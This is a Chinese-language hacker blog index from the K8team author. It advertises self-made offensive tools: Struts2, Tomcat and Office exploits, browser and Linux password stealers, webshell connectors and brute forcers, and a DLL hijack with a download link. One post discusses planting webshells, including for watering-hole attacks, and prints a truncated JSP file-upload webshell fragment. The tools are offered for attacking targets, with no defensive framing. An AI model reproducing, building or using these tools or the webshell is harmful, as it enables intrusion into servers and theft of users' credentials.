显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 
 

免责声明

 
 
模块内容加载中...
 
 
 
 
 

常去站点

 
 
模块内容加载中...
 
 
 
 
 
 
 

[置顶] [原创]K8 Struts2 Exp 20170310 S2-045(Struts2综合漏洞利用工具)

2014-7-31 10:27:59 阅读146920 评论46 312014/07 July31

工具: K8 Struts2 Exploit
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2014/7/31 10:24:56

简介:

K8 Struts2 综合漏洞利用工具 (Apache Struts Remote Code Execution Exploit)
Struts2漏洞检测工具   Struts2漏洞测试工具  K8 struts2 exploit Test  Struts2 GetShell

作者  | 2014-7-31 10:27:59 | 阅读(146920) |评论(46) | 阅读全文>>

K8飞刀  by K8拉登哥哥@[K8搞基大队]
博客: http://qqhack8.blog.163.com

简介: K8飞刀是一款多功能的安全测试工具. Hacker Swiss Army Knife.

      含大量漏洞EXP/GetShell/0day网马/U盘种马BadUSB/脱库采集工具
      支持7种WebShell管理/后台扫描/2级域名扫描/WordPress用户扫描
      黑客浏览器/自动检测注入/自动收集信息/Exp调式/可一键生成EXP
      多种编码转换/一键CSRF构造/Cookie一键登陆/XSS编码/SQL提权等

作者  | 2015-9-13 19:00:05 | 阅读(83691) |评论(27) | 阅读全文>>

[置顶] K8搞基工具包2013(编程开发/破解免杀/渗透提权)

2013-5-2 1:23:08 阅读50690 评论28 22013/05 May2

程序: K8搞基工具包2013
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2013/5/2 1:21:02

简介: K8搞基工具包2013(包含编程开发/破解免杀/渗透提权/等等综合工具包)

不多说上图片
 K8哥哥 s Blog
 
 K8哥哥 s Blog
 

作者  | 2013-5-2 1:23:08 | 阅读(50690) |评论(28) | 阅读全文>>

工具: ms15022_exploit
编译: VS2012  C# (.NET Framework v2.0)
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2015/7/31 17:12:49

简介:
漏洞编号:CVE-2015-0097 MS15-022
影响版本:office 2007 && office 2010 && office 2013
https://support.microsoft.com/zh-cn/kb/3038999

作者  | 2015-7-31 17:16:24 | 阅读(29776) |评论(7) | 阅读全文>>

[原创]浏览器密码读取工具(Chrome/Firefox)

2017-11-24 16:13:47 阅读1615 评论0 242017/11 Nov24

工具: getBrowserPWD
编译: VC
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2017/11/24 16:16:17

简介: 
浏览器密码读取工具支持(Chrome/Firefox),VC版无需.net环境
GitHub上有.net界面版和python源码 在自己电脑运行无所谓命令行版

chorme 42-56测试成功
firefox 31-52测试成功
WIN7-WIN10 UAC权限也可读

2017.6.19 by K8哥哥

作者  | 2017-11-24 16:13:47 | 阅读(1615) |评论(0) | 阅读全文>>

[原创]K8 CMS GoastGuard 密码解密工具

2017-11-24 15:35:56 阅读1163 评论0 242017/11 Nov24

工具: K8 CMS GoastGuard PASS Decrypt
编译: VS2012  C# (.NET Framework v4.5)
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2017/11/24 15:36:46

简介: 
K8 CMS GoastGuard PASS Decrypt 由于iii为.net 4.5.2版本
III其它版本不知是否一致 运行此工具也需要4.5.2版本
win10或2012可直接运行

作者  | 2017-11-24 15:35:56 | 阅读(1163) |评论(0) | 阅读全文>>

[EXP] Tomcat CVE-2017-12615 远程代码执行漏洞

2017-11-24 15:18:36 阅读2170 评论0 242017/11 Nov24

工具: K8_TocmatExp
编译: VS2012  C# (.NET Framework v2.0)
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2017/11/24 15:21:25

简介: 
Tomcat CVE-2017-12615 远程代码执行漏洞

图片: 

作者  | 2017-11-24 15:18:36 | 阅读(2170) |评论(0) | 阅读全文>>

[原创]K8_C段旁注工具6.0 新增SMB漏洞扫描

2017-11-24 15:10:46 阅读2194 评论2 242017/11 Nov24

工具: K8_C段旁注工具6.0_0510[K.8]
编译: 自己查壳
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2017/5/24 13:25:54

简介: 


图片: 
[原创]K8_C段旁注工具6.0 新增SMB漏洞扫描 - K8拉登哥哥 - K8拉登哥哥s Blog
 

功能: 
更新历史:

6.0 20170510

[+] C段SMB漏洞扫描(探测系统版本)

[+] 批量操作-文本比较提取新增内容

[+] 旁注查询-支持解析IPV6地址

[+] 旁注查询-完善全部导入导出功能

6.0 20170120

作者  | 2017-11-24 15:10:46 | 阅读(2194) |评论(2) | 阅读全文>>

[原创]内网渗透JSP webSehll连接工具

2017-11-24 14:55:22 阅读1381 评论0 242017/11 Nov24

工具: JspShellExec
编译: VS2012  C# (.NET Framework v2.0)
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2017/11/24 14:58:49

简介: 
      内网JSP webSehll连接工具,没什么技术含量。有空再增加其它脚本。
     只是方便在远控cmd或菜刀cmd上连接内网其它机器webshell执行命令。

作者  | 2017-11-24 14:55:22 | 阅读(1381) |评论(0) | 阅读全文>>

[神器]Linux明文密码读取工具

2017-5-24 2:40:30 阅读2826 评论0 242017/05 May24

工具: Linux明文密码读取工具

简介:

ubuntu 12.04 测试成功
BT5-R3 失败
Kali 1.0.2 失败

20170406

图片: 
[神器]Linux明文密码读取工具 - K8拉登哥哥 - K8拉登哥哥s Blog
 
[神器]Linux明文密码读取工具 - K8拉登哥哥 - K8拉登哥哥s Blog
 

作者  | 2017-5-24 2:40:30 | 阅读(2826) |评论(0) | 阅读全文>>

[原创]K8 MSF Bind Shell TCP 连接工具

2017-5-24 1:59:52 阅读2879 评论0 242017/05 May24

工具: K8_MSFBindShellClient_20170524[K.8]
编译: 自己查壳
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2017/5/24 1:51:02

简介: 
MSF Bind Shell TCP Client 无需安装MSF环境,连接msf绑定shell

图片:

[Tool]K8 MSF Bind Shell TCP Client - K8拉登哥哥 - K8拉登哥哥s Blog

作者  | 2017-5-24 1:59:52 | 阅读(2879) |评论(0) | 阅读全文>>



[原创]Struts2奇葩环境任意文件上传小马工具(菜刀无法传文件或乱码等) - K8拉登哥哥 - K8拉登哥哥s Blog
 
上面这问题问得好 
1 不知道大家有没碰到有些Strus2站点  上传JSP后访问404 或者503
    注意我说的是404或503不是403(要是403换个css/img等目录或许可以)
    但对于明明在web目录下放了jsp访问却404,怎么办?上exe 弄它啊 怎么办
2 估计大部分人碰到的是可以上传小马无法上传大马 怎么办?
3 碰到可上传菜刀马,但无法通过菜刀上传任何文件怎么办?
4 比如通过菜刀传别的马进去JSP代码被截断了怎么办?
5 或者说目标站点页面是XX语言,实施水坑,修改代码保存乱码 怎么办?

第一份 byte
<%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+requ

作者  | 2017-3-9 22:48:53 | 阅读(9405) |评论(0) | 阅读全文>>

工具: K8_FuckOneShell 20161224
编译: VS2012  C# (.NET Framework v4.0)
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2016/12/24 13:32:04

简介: 
采用多参数同时提交1000密码,本地内网测试10万/秒,3400万分别5-10分钟不等
支持ASP/PHP/ASPX/JSP/CFM/等菜刀自定义一句话,无视GPC模式的PHP爆破

作者  | 2016-12-24 13:45:45 | 阅读(7304) |评论(2) | 阅读全文>>

K8_C段旁注查询工具V5.0 20161214
作者:K8拉登哥哥 唯一QQ:396890445
平台: Windows + .NET Framework 4.0

简介:
K8_C段 提供4种方式查询子域名 必应(API & 搜索) + Google证书域名
支持获取主机名/探测操作系统/查询子域名/邮箱帐号/证书绑定域名等
筛选功能可自定义关键字或指定筛选,助安全人员快速找询易下手目标.
C段方式1: 需要Key,C段最全,准确度最高.(比同类工具查询更准的原因)
C段方式2: 不需要Key,速度最快.缺点:结果没API全,必应抽风时无法查询
渗透大站 方式1和方式2均支持子域名查询 证书查询域名效果会非常好
指纹识别速度极快 支持30款国外主流CMS识别  智能识别未知CMS

图文

作者  | 2016-12-14 1:07:52 | 阅读(8442) |评论(6) | 阅读全文>>

[提权]Notepad++ DLL却持漏洞

2016-12-1 23:56:00 阅读4158 评论0 12016/12 Dec1

[却持]Notepad++ DLL却持漏洞 - K8拉登哥哥 - K8拉登哥哥s Blog

1 把K8dllhijack.dll改名和EXE同目录
2 运行EXE程序 (因吹斯听)
EXP:: http://pan.baidu.com/s/1geQ0gKF

作者  | 2016-12-1 23:56:00 | 阅读(4158) |评论(0) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 
 
日志评论
评论列表加载中...
 
 
 
 
 
 
 
 

 未设置 天秤座

 发消息  写留言

 
K8搞基大队队长 专注于被妞泡
 
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 

热门日志

 
 
数据列表加载中...
 
 
 
 
 

归档

 
 
数据加载中...
 
 
 
 
 

日志分类

 
 
日志分类列表加载中...
 
 
 
 
 
 
 
模块内容加载中...
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018

注册 登录  
 加关注